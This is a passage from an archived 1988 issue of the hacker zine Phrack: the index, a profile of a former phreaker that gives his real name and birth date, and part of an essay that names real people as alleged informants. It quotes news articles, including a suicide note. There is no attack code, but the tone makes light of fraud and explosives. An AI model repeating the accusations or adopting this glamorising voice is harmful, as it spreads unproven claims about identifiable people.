home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 22.sit / Phrack Issue 22
Text File  |  1993-02-08  |  256KB  |  5,406 lines

  1.  
  2.  
  3.  
  4.                                 ==Phrack Inc.==
  5.  
  6.                       Volume Two, Issue 22, File 1 of 12
  7.  
  8.  
  9.                     Phrack Inc. Newsletter Issue XXII Index
  10.                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  11.                                December 23, 1988
  12.  
  13.              Happy Holidays And Welcome To Phrack Inc. Issue XXII!
  14.  
  15. As the golden days of the phreak/hack community fall behind us, it appears that
  16. many of the "old elites" have found themselves in highly respected jobs and
  17. throughout the course of time, their handles became synonymous with their real
  18. names.  As the saying goes, "You can't keep a good hacker down," and many of
  19. these people are still interested in being a part of the community.
  20.  
  21. In order to help protect the anonymity of these people who are interested in
  22. writing for Phrack, we have brought back the concept of ">Unknown User<."  This
  23. nametag will fill the spot for any author who desires to submit a file, but
  24. does not wish for his handle to be seen in the file itself.  So if fear of
  25. publicity has held you back from submitting an article, don't worry any longer.
  26.  
  27. We here at Phrack Inc. would like to give The Mentor a special commendation for
  28. an extremely well written file.  The spirit of The Phoenix Project continues
  29. within a really decent guide for new hackers.
  30.  
  31. Due to the large amounts of controversy regarding the recent rampage of the
  32. InterNet Worm, this issue of Phrack contains a lot of information about the
  33. Worm and its effects, the majority of which is scattered within the pages of
  34. Phrack World News, but we were also able to get a hold of Bob Page's Report.
  35.  
  36. For anyone who has a legitimate account on MCI Mail, GTE Telemail, or any of
  37. the standard Bitnet reachable places, let us know and we can have Phrack
  38. delivered to your mailbox.
  39.  
  40. For those of you wishing to submit files to Phrack Inc., please send them to
  41. us at our Bitnet accounts or if that is not possible, contact The Mentor on the
  42. Phoenix Project BBS (512-441-3088).  Once again, its great to be back!
  43.  
  44.                                              Taran King & Knight Lightning
  45.  
  46.                                   C488869@UMCVMB.BITNET & C483307@UMCVMB.BITNET
  47.  
  48. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  49.  
  50. This issue contains the following files;
  51.  
  52. 1.  Index by Taran King and Knight Lightning
  53. 2.  Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning
  54. 3.  The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL
  55. 4.  A Novice's Guide To Hacking (1989 Edition) by The Mentor
  56. 5.  An Indepth Guide In Hacking Unix by Red Knight
  57. 6.  Yet Another File On Hacking Unix by >Unknown User<
  58. 7.  Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger
  59. 8.  A Report On The InterNet Worm by Bob Page
  60. 9-12 Phrack World News Issue XXII by Knight Lightning and Taran King
  61. _______________________________________________________________________________
  62. =========================================================================
  63.  
  64.                                 ==Phrack Inc.==
  65.  
  66.                       Volume Two, Issue 22, File 2 of 12
  67.  
  68.                            ==Phrack Pro-Phile XXII==
  69.  
  70.                              Created By Taran King
  71.  
  72.                Brought To You By Taran King and Knight Lightning
  73.  
  74.                             Done on October 8, 1988
  75.  
  76.          Welcome to Phrack Pro-Phile XXII.  Phrack Pro-Phile was created to
  77. bring information to you, the community, about retired or highly important/
  78. controversial people.  This issue, we bring to you a name from the past and
  79. a user of highly respected rankings in the history of the phreak/hack world...
  80.  
  81.                                    Karl Marx
  82.                                    ~~~~~~~~~
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84.  
  85. Personal
  86. ~~~~~~~~
  87.            Handle:  Karl Marx
  88.          Call Him:  James Salsman
  89.      Past Handles:  None
  90.     Handle Origin:  Bloom County (Something about Capitalists and Humor)
  91.     Date Of Birth:  12/2/67
  92.            Height:  6"0'
  93.            Weight:  155 lbs
  94.         Eye Color:  Blue
  95.        Hair Color:  Dark Brown
  96.         Shoe Size:  10 1/2
  97.         Computers:  Nondeterministic turing machines
  98. Sysop/Co-Sysop Of:  Farmers of Doom
  99.  
  100. Origins In Phreak/Hack World:
  101.     Manufacturing Explosives -- He wanted to blow up his High School.
  102.  
  103. Origins In Phreak/Hack BBSes:  Plovernet!
  104.  
  105. People In The Phreak/Hack World Met:
  106.  
  107.     The Buccaneer, Mark Tabas, Shadow Master, and a few other Colorado types.
  108.     He also actually made it to a TAP meeting a while ago [TelePub '86], but he
  109.     slept through it.  All he remembers is that it was in New York and Scan Man
  110.     was there in a baseball cap.  He thinks it was in a "Days Inn" or
  111.     something.
  112.  
  113.  
  114. Experience Gained In The Following Ways:
  115.  
  116.     Spending long hours pouring over Bell System Tech Journals from
  117.     1970-Present.  He suggests to anyone who wants to learn non-trivial, but
  118.     useful things -- or who just wants to get some really *powerful*
  119.     vocabulary for social engineering -- try using your local college or large
  120.     public library.
  121.  
  122.  
  123. Knowledge Attributed To:
  124.  
  125.     Nearly everyone who he's ever talked to -- if you let people bullshit you
  126.     long enough, you learn quite a bit just by figuring out why they are wrong.
  127.  
  128.  
  129. Memorable Phreak/Hack BBSes:  Plovernet, Legion of Doom, Shadowland, and of
  130.                               course the invisible 3rd level of FOD.
  131.  
  132.  
  133. Work/Schooling (Major):
  134.  
  135.     Carnegie Mellon University.  He dropped out as soon as they let him work on
  136.     interesting Cognitive Science and AI projects.  He currently works at
  137.     Expert Technologies -- the company has an expert system for putting
  138.     together various Yellow Pages for client phone companies that he is not
  139.     supposed to name (there's no point in naming them, 'cause by now they do
  140.     every fucking Yellow Pages in the country -- ACK!)  But that's just what
  141.     makes the company money.  He's working on user interfaces based on speech
  142.     recogniton.
  143.  
  144.  
  145. Conventions/Involvements Outside Of Phone Calls:
  146.  
  147.     He thinks he went to that TAP [Telepub '86] meeting, but he doesn't
  148.     remember much more than Scan Man's cap.  He was INTENSELY tired and his
  149.     girlfreind was complaining that everyone was a geek and that they had to
  150.     find a way to get back in Pittsburgh in four hours.
  151.  
  152.  
  153. Accomplishments:
  154.  
  155.     He wrote somthing about Nitroglycerin.  He probably killed a lot of
  156.     aspiring phreaks on Plovernet by not putting in enough warnings like
  157.     "Remember, DON'T make more than a few grams or you will be found dead and
  158.     identified as Dinty Morre Beef Stew."  He also came up with the "RESCOC --
  159.     Remote Satellite Course Correction System" file.  It was PURE bullshit, but
  160.     with headings like "How to manuver a satelite to crash it into cities (like
  161.     Moscow)" it was a big hit with the "Hacker-Hype" media.  AT&T denied
  162.     everything.
  163.  
  164.  
  165. Phreak/Hack Groups:  He got a lot of mail saying somthing like;
  166.  
  167.     "Congratulations! You MAY ALREADY HAVE WON membership into the NEW GROUP...
  168.  
  169.                        ----- THE CAPTAINS OF CODES -----
  170.  
  171.     It's the best new phreak/hack group since MIT!  Just tell us everything you
  172.     know and tell everyone else what a great group we are -- AND WE WILL LET
  173.     YOU BE A MEMBER OF... ----- THE CAPTAINS OF CODES -----"
  174.     He usually ignored these "memberships."  He believes Tabas understood the
  175.     problem when he created the parody-group "Farmers of Doom."
  176.  
  177.  
  178. Interests:
  179.  
  180.     His main interest is AI.  His particular application domains focus on
  181.     Cognitive Science and Pattern recognition.  He thinks he might have been
  182.     interested in the telephone system -- but those days are over.  He doesn't
  183.     even remember the codes to do trunk selection on an RTA distribution point.
  184.     And if the ROCs security folks think he still does that sort of thing they
  185.     are going to have to prove it.  :-)
  186.  
  187.  
  188. Favorite Things;
  189.  
  190.     Thinking:      Problem Solving
  191.     Conversation:  Exchange of information
  192.     Love:          Emotional fulfillment
  193.     Sex:           Physical fulfillment
  194.     Drugs:         Introspection
  195.     Poetry:        Metaphor, Imagery
  196.     Involvement:   Sense of Self-Worth
  197.     Music:         Rhythm, Harmonics
  198.     Food:          Flavor, Satisfaction
  199.     Breathing:     Inhalation of Oxygen
  200.  
  201.  
  202. Most Memorable Experience:
  203.  
  204.     The funniest thing that ever happened to him was the time he was arrested.
  205.     The Secret Service had bugged this hotel room and surprised them (always
  206.     remember, SECRET service and ROOM service are not *that* different.)  They
  207.     took them to a Denver Police holding tank that was filled with non-sober
  208.     hooligans.
  209.  
  210.     Unfortunately, he was in a business suit (having just returned from handing
  211.     a $5,000,000.00 "certified" check to Charles Schwab in Sacramento).  So
  212.     there were all these drunk people asking me, "Ahre yha my lawer???"
  213.  
  214.     Of course, Mark Tabas had it easy in his Hawaiian print shirt, but he had
  215.     to deal with "Whatcha here fur?"  Jim told them that he was being held for
  216.     "Fraud."  That explanation didn't seem to satisfy them -- "Har, har, har!
  217.     Fraud!  The kid's in here for fraud!  Let me tell you what I'm in for!
  218.     What do you think I'm here for??"
  219.  
  220.     He didn't have the heart to tell the gentlemen that he really didn't care
  221.     why they shared such a predicament so he responded with a blank stare.
  222.     They then went on to describe crimes so horrible that he could hardly
  223.     believe them, if it wasn't for the fact that most of them were at least two
  224.     thirds covered in blood.  That sort of gave them the advantage, so he went
  225.     on to tell them that he must have been put in the wrong cell and that he
  226.     was sure that the jailer would transfer him in just a few hours.  They all
  227.     seemed to accept that, and went on to insulting each other.
  228.  
  229.  
  230. Some People To Mention:
  231.  
  232. o   "I'd like to thank Who-Bob and T-Bob for their long hours they spent
  233.     discussing new and innovative ESS social engineering techniques.
  234.  
  235. o   I am forever indebted to Mark Tabas for his courage and demeanor in the
  236.     face of adversity -- which is to say that getting busted didn't bother him
  237.     as much as disk space problems did.
  238.  
  239. o   There's this guy named "Chuck" in the 303 T5 center who I'd like to mention
  240.     because he set up a RTA routing code for me that switched incoming toll
  241.     trunks to BLV trunks -- if only everyone were that stupid!"
  242.  
  243.  
  244. Inside Jokes:  "Sorry, sir, we were just trying to find some wire for our
  245.                science fair project, but as there appears to be nothing here
  246.                but coffee grounds and cigarette ashes, we had better get going.
  247.                Have a nice day!"
  248.  
  249.  
  250. Serious Section:  He's very strongly against geting busted.
  251.  
  252.  
  253. Are Phreaks/Hackers You've Met Generally Computer Geeks?
  254.  
  255.     He hopes not!  Most of the people that used to be computer geeks around CMU
  256.     now wear suits and ties and have six digit salaries.  What a horrible
  257.     thing!  He wouldn't wish that on his worst enemy!
  258.  
  259.  
  260. Busted For:  He was busted for being in a hotel room with Steve Dahl.  He was
  261.              convicted of the law that says, in effect "it's illegal to lie to
  262.              somebody more powerful than you."  He stopped phreaking because he
  263.              was on probation and didn't want to go to prison.  He is NOT
  264.              planning a comeback.
  265.  
  266. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  267. Thanks for your time James.
  268.  
  269.                         Taran King and Knight Lightning
  270. _______________________________________________________________________________
  271. ================================================================
  272.  
  273.  
  274.                                 ==Phrack Inc.==
  275.  
  276.                       Volume Two, Issue 22, File 3 of 12
  277.  
  278.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  279.        <>                                                            <>
  280.        <>                     The Judas Contract                     <>
  281.        <>                     ~~~~~~~~~~~~~~~~~~                     <>
  282.        <>           Part Two Of The Vicious Circle Trilogy           <>
  283.        <>                                                            <>
  284.        <>           An Exploration of The Quisling Syndrome          <>
  285.        <>                             and                            <>
  286.        <>  A Look At The Insurrection Of Security Into The Community <>
  287.        <>                                                            <>
  288.        <>                Presented by Knight Lightning               <>
  289.        <>                       August 7, 1988                       <>
  290.        <>                                                            <>
  291.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  292.  
  293.  
  294. The Quisling Syndrome
  295. ~~~~~~~~~~~~~~~~~~~~~
  296. Definition:  Quisling - (Kwiz/lin)  (1) n. Vidkun Quisling (1887 - 1945),
  297.                                            Norwegian politician who betrayed
  298.                                            his country to the Nazis and became
  299.                                            its puppet ruler.
  300.  
  301.                                     (2) n. A traitor.
  302. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  303.  
  304. The "Quisling" Syndrome is rapidly becoming a common occurrence in the less
  305. than legal realms of the modem community.  In general it starts out with a
  306. phreaker or hacker that is either very foolish or inexperienced.  He somehow
  307. manages to get caught or busted for something and is scared beyond belief about
  308. the consequences of his actions.  At this point, the law enforcement agency(s)
  309. realize that this one bust alone is worthless, especially since the person
  310. busted is probably someone who does not know much to begin with and would be a
  311. much better asset if he could assist them in grabbing other more experienced
  312. and dangerous hackers and phreaks.  In exchange for these services the Judas
  313. will have his charges dropped or reduced and considering the more than likely
  314. parential pressure these Judases will receive, the contract will be fulfilled.
  315.  
  316. Example; Taken from Phrack World News Issue XV;
  317.  
  318.            [This exceprt has been edited for this presentation. -KL]
  319. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  320.  
  321. Mad Hatter; Informant?                                            July 31, 1987
  322. ~~~~~~~~~~~~~~~~~~~~~~
  323. We at Phrack Inc. have uncovered a significant amount of information that has
  324. led us to the belief that Mad Hatter is an informant for some law enforcement
  325. organization.
  326.  
  327. MH had also brought down several disks for the purpose of copying Phantasie
  328. Realm.  Please note; PR was an IBM program and MH has an apple.
  329.  
  330. Control C told us that when he went to pick MH up at the bus terminal, he
  331. watched the bus pull in and saw everyone who disembarked.  Suddenly Mad Hatter
  332. was there, but not from the bus he was supposed to have come in on.  In
  333. addition to this, he had baking soda wraped in a five dollar bill that he tried
  334. to pass off as cocaine.  Perhaps to make us think he was cool or something.
  335.  
  336. MH constantly tried to get left behind at ^C's apartment for unknown reasons.
  337. He also was seen at a neighbor's apartment making unauthorized calls into the
  338. city of Chicago.  When asked who he called, his reply was "Don't worry about
  339. it."  MH had absolutely no money with him during PartyCon (and incidentally ate
  340. everything in ^C's refrigerator) and yet he insisted that although he had taken
  341. the bus down and had return trip tickets for the bus, that he would fly back
  342. home.  How was this going to be achieved?  He had no money and even if he could
  343. get a refund for the bus tickets, he would still be over $200 short.  When
  344. asked how he was going to do this, his reply was "Don't worry about it."
  345.  
  346. On Saturday night while on the way to the Hard Rock Cafe, Mad Hatter asked
  347. Control C for the location of his computer system and other items 4 times.
  348. This is information that Hatter did not need to know, but perhaps a SS agent or
  349. someone could use very nicely.
  350.  
  351. When Phrack Inc. discovered that Dan The Operator was an FBI informant and made
  352. the news public, several people were criticizing him on Free World II Private.
  353. Mad Hatter on the other hand, stood up for Noah and said that he was still his
  354. friend despite what had happened.  Then later when he realized that people were
  355. questioning his legitimacy, his original posts were deleted and he started
  356. saying how much he wanted to kill Dan The Operator and that he hated him.
  357.  
  358. Mad Hatter already has admitted to knowing that Dan The Operator was an FBI
  359. informant prior to SummerCon '87.  He says the reason he didn't tell anyone is
  360. because he assumed we already knew.
  361.  
  362. A few things to add;
  363.  
  364. ^*^  Some time ago, Mad Hatter was contacted by AT&T because of an illegal
  365.      Alliance Teleconference that he was responsible for.  There was no bust.
  366. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  367.  
  368. Could this AT&T investigation have been the starting point for Mad Hatter's
  369. treason against the phreak/hack community?  Is there more to it than that?
  370. We may never know the full truth behind this, however we do know that Mad
  371. Hatter was not the only one to know Dan The Operator's secret prior to
  372. SummerCon '87.  The Executioner (who had close ties to TMC Security employees
  373. in Omaha, Nebraska) was fully aware of Dan The Operator's motives and
  374. intentions in the modem world.
  375.  
  376. There does not always have to be a bust involved for a phreak/hacker to turn
  377. Judas, sometimes fear and panic can be a more powerful motivator to become a
  378. Quisling.
  379.  
  380. Example; Taken From Phrack World News Issue XV;
  381.  
  382.            [This exceprt has been edited for this presentation. -KL]
  383. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  384.  
  385. Crisis On Infinite Hackers                                        July 27, 1987
  386. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  387. It all started on Tuesday, July 21, 1987.  Among 30-40 others, Bill From RNOC,
  388. Eric NYC, Solid State, Oryan QUEST, Mark Gerardo, The Rebel, and Delta-Master
  389. have been busted by the United States Secret Service.  There are rumored to be
  390. several more members of the more "elite" community busted as well, but since we
  391. can neither disprove or prove the validity of these rumors, I have chosen not
  392. to name them at this time.
  393.  
  394. One of the offshoots of this investigation is the end of The Lost City of
  395. Atlantis and The Lineman's treason against the community he once helped to
  396. bring about.  In Pennsylvainia, 9 people were busted for credit card fraud.
  397. When asked where they learned how to perform the art in which they had been
  398. caught, they all responded with the reply of text files from The Lost City Of
  399. Atlantis.
  400.  
  401. So, the Secret Service decided to give The Lineman a visit.  Lineman, age 16 (a
  402. minor) had no charges against him, but he panicked anyway and turned over the
  403. bulletin board, all g-philes, and the complete userlog to the Secret Service.
  404. This included information from the "Club Board."  The final outcome of this
  405. action is still on its way.  In the meantime, many hackers are preparing for
  406. the worst.
  407. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  408. The results and consequences from The Lineman's actions were far more severe
  409. than they originally appeared.  It is highly speculated that The Lineman was in
  410. possesion on a very large directory of phreaks/hackers/pirates that he had
  411. recently acquired.  That list is now in the hands of the government and the
  412. Communications Fraud Control Association (as well as in the files of all of the
  413. individual security departments of CFCA members).  I've seen it and more.
  414.  
  415. The Lineman was able to acquire this list because one phreak stole it from
  416. another and then began to trade it to his friends and to others for information
  417. and passwords, etc. and what happened from there is such an over exposure and
  418. lack of CONTROL that it fell into the wrong and dangerous hands.  Acts such as
  419. this will with out a doubt eventually lead all of us towards entropy.
  420.  
  421. Captain Caveman, also known as Shawn of Phreakers Quest, began work to help TMC
  422. after he was set up by Scan Man during the summer of 1986.
  423.  
  424. However, being busted or feeling panic are still not the only motivations for
  425. becoming a Judas.  John Maxfield, one of today's best known security
  426. consultants, was once a hacker under the handle(s) of Cable Pair and Uncle Tom.
  427. He was a member of the Detroit based Corrupt Computing and the original Inner
  428. Circle until he was contacted by the FBI and decided that it would be more fun
  429. to bust hackers than be one.
  430.  
  431. The following is an excerpt from Phrack World News Issue V;
  432.  
  433.            [This article has been edited for this presentation. -KL]
  434. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  435.  
  436. Computer Kids, Or Criminals?
  437. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  438. John Maxfield is a computer security consultant who lives in a downriver
  439. suburb.  Maxfield spends most of his working hours scanning BBSs, and is known
  440. by computer crime experts as a hacker tracker.  His investigative work scanning
  441. boards has resulted in more prosecutions of computer hackers than anyone else
  442. in the field, say sources familiar with his work.  Maxfield, who accepts death
  443. threats and other scare tactics as part of the job, says the trick is knowing
  444. the enemy.  Next to his monstrous, homemade computer system, Maxfield boasts
  445. the only file on computer hackers that exists.  [Not true any longer -KL]  It
  446. contains several thousand aliases used by hackers, many followed by their real
  447. names and home phone numbers.  All of it is the result of four years of steady
  448. hacker-tracking, says Maxfield. "I've achieved what most hackers would dearly
  449. love to achieve," said Maxfield.  "Hacking the hacker is the ultimate hack."
  450.  
  451. Maxfield estimates there are currently 50,000 hackers operating in the computer
  452. underground and close to 1,000 underground bulletin boards.  Of these, he
  453. estimates about 200 bulletin boards are "nasty," posting credit card numbers,
  454. phone numbers of Fortune 500 corporations, regional phone companies, banks, and
  455. even authored tutorials on how to make bombs and explosives.  One growing camp
  456. of serious hackers is college students, who typically started hacking at 14 and
  457. are now into drug trafficking, mainly LSD and cocaine, said Maxfield.
  458.  
  459. Maxfield's operation is called BoardScan.  He is paid by major corporations and
  460. institutions to gather and provide them with pertinent intelligence about the
  461. computer underground.  Maxfield also relies on reformed hackers.  Letters of
  462. thanks from VISA and McDonald's decorate a wall in his office along with an
  463. autographed photo of Scottie, the engineer on Star Trek's Starship Enterprise.
  464.  
  465. Often he contacts potential clients about business.  "More often I call them
  466. and say, I've detected a hacker in your system," said Maxfield.  "At that
  467. point, they're firmly entrenched.  Once the hackers get into your computer,
  468. you're in trouble.  It's analogous to having roaches or mice in the walls of
  469. your house.  They don't make their presence known at first.  But one day you
  470. open the refrigerator door and a handful of roaches drop out."
  471.  
  472. Prior to tracking hackers, Maxfield worked for 20-odd years in the hardware end
  473. of the business, installing and repairing computers and phone systems.  When
  474. the FBI recruited him a few years back to work undercover as a hacker and phone
  475. phreak, Maxfield concluded fighting hacker crime must be his mission in life.
  476.  
  477. "So I became the hacker I was always afraid I would become," he said.  Maxfield
  478. believes the hacker problem is growing more serious.  He estimates there were
  479. just 400 to 500 hackers in 1982.  Every two years, he says, the numbers
  480. increase by a factor of 10.  Another worrisome trend to emerge recently is the
  481. presence of adult computer hackers.  Some adults in the computer underground
  482. pose as Fagans, a character from a Charles Dickens novel who ran a crime ring
  483. of young boys, luring young hackers to their underground crime rings.
  484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  485.  
  486. John Freeman Maxfield's BoardScan is also known as the Semco Computer Club and
  487. Universial Export, the latter coming from the company name used by the British
  488. government in Ian Flemming's James Bond novels and subsequent motion pictures.
  489.  
  490. Another Judas hacker who went on to become a security consultant is the
  491. infamous Ian Arthur Murphy of I.A.M. Security.  Perhaps he is better known as
  492. Captain Zap.
  493.  
  494. The following excerpt is from The Wall Street Journal;
  495.  
  496. [This article has been edited for this presentation. -KL]
  497. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  498.  
  499. It Takes A Hacker To Catch A Hacker As Well As A Thief         November 3, 1987
  500. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  501. by Dennis Kneale (Staff Reporter Of The Wall Street Journal)
  502.  
  503.               "Computer Hacker Ian [Arthur] Murphy Prowls A Night
  504.                Beat Tracking Down Other Hackers Who Pirate Data"
  505.  
  506.      Capt. Zap actually Ian A. Murphy, is well-known as one of the first
  507. convicted computer-hacker thieves.  He has since reformed -- he swears it --
  508. and has been resurrected as a consultant, working the other side of the law.
  509.  
  510. CRIME CREDENTIALS
  511.      Other consultants, many of them graying military vets, try to flush out
  512. illicit hackers.  But few boast the distinction of being a real hacker -- and
  513. one with a felony among his credentials.  Capt. Zap is more comfortable at the
  514. screen than in a conversation.  Asked to name his closest friend, he shakes his
  515. head and throws up his hands.  He has none.  "I don't like people," he says.
  516. "They're dreadful."
  517.      "He's legendary in the hacking world and has access to what's going on.
  518. That's a very valuable commodity to us," says Robert P. Campbell of Advanced
  519. Information Management in Woodbridge, Va., Mr. Murphy's mentor, who has hired
  520. him for consulting jobs.  The 30-year-old Mr. Murphy is well-connected into his
  521. nocturnal netherworld.  Every night till 4 a.m., he walks a beat through some
  522. of the hundreds of electronic bulletin boards where hackers swap tales and
  523. techniques of computer break-ins.
  524.      It is very busy these nights.  On the Stonehenge bulletin board, "The
  525. Marauder" has put up a phone number for Citibank's checking and credit-card
  526. records, advising, "Give it a call."  On another board, Mr. Murphy finds a
  527. primer for rookie "hacklings," written by "The Knights Of Shadow."  On yet
  528. another he sifts out network codes for the Defense Department's research
  529. agency.
  530.      He watches the boards for clients and warns when a system is under attack.
  531. For a fee of $800 a day and up, his firm, IAM/Secure Data Systems Inc., will
  532. test the security of a data base by trying to break in, investigate how the
  533. security was breached, eavesdrop on anyone you want, and do anything else that
  534. strikes his fancy as nerd vs. spy.  He says his clients have included Monsanto
  535. Co., United Airlines, General Foods Corp., and Peat Marwick.  Some probably
  536. don't know he worked for them.  His felony rap -- not to mention his caustic
  537. style -- forces him to work often under a more established consultant.  "Ian
  538. hasn't grown up yet, but he's technically a brilliant kid," says Lindsey L.
  539. Baird, an Army veteran whose firm, Info-Systems Safeguards in Morristown, New
  540. Jersey has hired Capt. Zap.
  541.      Mr. Murphy's electronic voyeurism started early,  At age 14, he would
  542. sneak into the backyard to tap into the phone switch box and listen to
  543. neighbor's calls.  (He still eavesdrops now and then.)  He quit highschool at
  544. age 17.  By 19 he was impersonating a student and sneaking into the computer
  545. center Temple University to play computer games.
  546.  
  547. EASY TRANSITION
  548.      From there it was an easy transition to Capt. Zap's role of breaking in
  549. and peeking at academic records, credit ratings, a Pentagon list of the sites
  550. of missiles aimed at the U.S., and other verboten verbiage.  He even left his
  551. resume inside Bell of Pennsylvania's computer, asking for a job.
  552.      The electronic tinkering got him into trouble in 1981.  Federal agents
  553. swarmed around his parent's home in the wealthy suburb of Gladwyne, Pa.  They
  554. seized a computer and left an arrest warrant.  Capt. Zap was in a ring of eight
  555. hackers who ran up $212,000 in long-distance calls by using a "blue box" that
  556. mimics phone-company gear.  They also ordered $200,000 in hardware by charging
  557. it to stolen credit-card numbers and using false mail drops and bogus purchase
  558. orders.  Mr. Murphy was the leader because "I had the most contempt" for
  559. authority, he says.
  560.      In 1982, he pleaded guilty to receiving stolen goods and was sentenced to
  561. 1,000 hours of community service and 2 1/2 years of probation.  "It wasn't
  562. illegal.  It was electronically unethical," he says, unrepentant.  "Do you know
  563. who likes the phone company?"  Who would have a problem with ripping them off?"
  564.      Mr. Murphy, who had installed commercial air conditioning in an earlier
  565. job, was unable to find work after his arrest and conviction.  So the hacker
  566. became a hack.  One day in his cab he picked up a Dun & Bradstreet Corp.
  567. manager while he was carrying a printout of hacker instructions for tapping
  568. Dun's systems.  Thus, he solicited his first consulting assignment:  "I think
  569. you need to talk to me."  He got the job.
  570.      As a consultant, Mr. Murphy gets to do, legally, the shenanigans that got
  571. him into trouble in the first place.  "When I was a kid, hacking was fun.  Now
  572. I can make money at it and still have a lot of fun."
  573. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  574. Now because of all the publicity surrounding our well known friends like Ian
  575. Murphy or John Maxfield, some so-called hackers have decided to cash in on news
  576. coverage themselves.
  577.  
  578. Perhaps the most well known personality that "sold out" is Bill Landreth aka
  579. The Cracker, who is the author of "Out Of The Inner Circle," published by
  580. Microsoft Press.  The book was definitely more fiction than fact as it tried to
  581. make everyone believe that not only did The Cracker form the Inner Circle, but
  582. that it was the first group ever created.  However, for starters, The Cracker
  583. was a second-rate member of Inner Circle II.  The publicity from the book may
  584. have served to bring him some dollars, but it ultimately focused more negative
  585. attention on the community adding to an already intense situation.  The
  586. Cracker's final story had a little sadder ending...
  587.  
  588. Taken from Phrack World News Issue X;
  589.  
  590. [This article has been edited for this presentation. -KL]
  591. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  592.  
  593. The Cracker Cracks Up?                                        December 21, 1986
  594. ~~~~~~~~~~~~~~~~~~~~~~
  595.          "Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive"
  596.  
  597. ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill
  598. Landreth pushed himself away from his IBM-PC computer -- its screen glowing
  599. with an uncompleted sentence -- and walked out the front door of a friend's
  600. home here.
  601.  
  602. He has not been seen or heard from since.
  603.  
  604. The authorities want him because he is the "Cracker", convicted in 1984 of
  605. breaking into some of the most secure computer systems in the United States,
  606. including GTE Telemail's electronic mail network, where he peeped at NASA
  607. Department of Defense computer correspondence.
  608.  
  609. His literary agent wants him because he is Bill Landreth the author, who
  610. already has cashed in on the successful publication of one book on computer
  611. hacking and who is overdue with the manuscript of a second computer book.
  612.  
  613. The Institute of Internal Auditors wants him because he is Bill Landreth the
  614. public speaker who was going to tell the group in a few months how to make
  615. their computer systems safer from people like him.
  616.  
  617. The letter, typed into his computer, then printed out and left in his room for
  618. someone to discover, touched on the evolution of mankind, prospects for man's
  619. immortality and the defeat of the aging process, nuclear war, communism versus
  620. capitalism, society's greed, the purpose of life, computers becoming more
  621. creative than man and finally -- suicide.
  622.  
  623. The last page reads:
  624.  
  625. "As I am writing this as of the moment, I am obviously not dead.  I do,
  626. however, plan on being dead before any other humans read this.  The idea is
  627. that I will commit suicide sometime around my 22nd birthday..."
  628.  
  629. The note explained:
  630.  
  631. "I was bored in school, bored traveling around the country, bored getting
  632. raided by the FBI, bored in prison, bored writing books, bored being bored.  I
  633. will probably be bored dead, but this is my risk to take."
  634.  
  635. But then the note said:
  636.  
  637. "Since writing the above, my plans have changed slightly.... But the point is,
  638. that I am going to take the money I have left in the bank (my liquid assets)
  639. and make a final attempt at making life worthy.  It will be a short attempt,
  640. and I do suspect that if it works out that none of my current friends will know
  641. me then.  If it doesn't work out, the news of my death will probably get
  642. around.  (I won't try to hide it.)"
  643.  
  644. Landreth's birthday is December 26 and his best friend is not counting on
  645. seeing him again.
  646.  
  647. "We used to joke about what you could learn about life, especially since if you
  648. don't believe in a God, then there's not much point to life," said Tom
  649. Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles
  650. north of San Diego.  Anderson also has been convicted of computer hacking and
  651. placed on probation.
  652.  
  653. Anderson was the last person to see Landreth.  It was around September 25 -- he
  654. does not remember exactly.  Landreth had spent a week living in Anderson's home
  655. so the two could share Landreth's computer.  Anderson's IBM-PC had been
  656. confiscated by authorities, and he wanted to complete his own book.
  657.  
  658. Anderson said he and Landreth were also working on a proposal for a movie about
  659. their exploits.
  660.  
  661. Apparently Landreth took only his house key, a passport, and the clothes on his
  662. back.
  663.  
  664. But concern grew by October 1, when Landreth failed to keep a speaking
  665. engagement with a group of auditors in Ohio, for which he would have received
  666. $1,000 plus expenses.  Landreth may have kept a messy room and poor financial
  667. records, but he was reliable enough to keep a speaking engagement, said his
  668. friends and literary agent, Bill Gladstone, noting that Landreth's second
  669. manuscript was due in August and had not yet been delivered.
  670.  
  671. But, the manuscript never came and Landreth has not reappeared.
  672.  
  673. Steve Burnap, another close friend, said that during the summer Landreth had
  674. grown lackadaisical toward life.  "He just didn't seem to care much about
  675. anything anymore."
  676. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  677. Landreth eventually turned up in Seattle, Washington around the third week of
  678. July 1987.  Because of his breaking probation, he is back in jail finishing his
  679. sentence.
  680.  
  681. Another individual who wanted to publicize himself is Oryan QUEST.  Ever since
  682. the "Crisis On Infinite Hackers" that occurred on July 21, 1987, QUEST has been
  683. "pumping" information to John Markoff -- a reporter for the San Francisco
